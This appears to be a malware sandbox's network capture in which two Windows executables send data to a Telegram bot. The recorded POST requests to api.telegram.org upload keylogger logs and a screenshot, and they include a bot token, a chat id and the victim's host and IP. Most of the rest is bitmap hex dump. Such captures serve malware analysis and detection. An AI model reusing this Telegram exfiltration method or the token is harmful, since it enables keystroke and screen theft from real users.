2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:11 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:15 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49816	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:17 UTC	556	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 2548 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:17 UTC	2548	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 71 4a 48 6a 56 43 77 50 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 35 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 35 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 35 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataqJHjVCwP.txt"Content-Type: application/octet-stream[08:27:58]<<Program Manager>>[08:27:58]<<Program Manager>>[08:27:58]<<Program Mana
2024-12-03 13:28:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:17 GMT Content-Type: application/json Content-Length: 547 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:17 UTC	547	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 34 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3888,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232497,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49817	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:17 UTC	556	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 2482 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:17 UTC	2482	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 74 72 6a 52 62 61 45 4d 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 35 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 35 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 35 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatatrjRbaEM.txt"Content-Type: application/octet-stream[08:27:59]<<Program Manager>>[08:27:59]<<Program Manager>>[08:27:59]<<Program Mana
2024-12-03 13:28:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:17 GMT Content-Type: application/json Content-Length: 548 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:17 UTC	548	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 34 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3889,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232497,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49834	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:24 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 45 7a 57 44 49 72 76 65 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotEzWDIrve.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:24 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 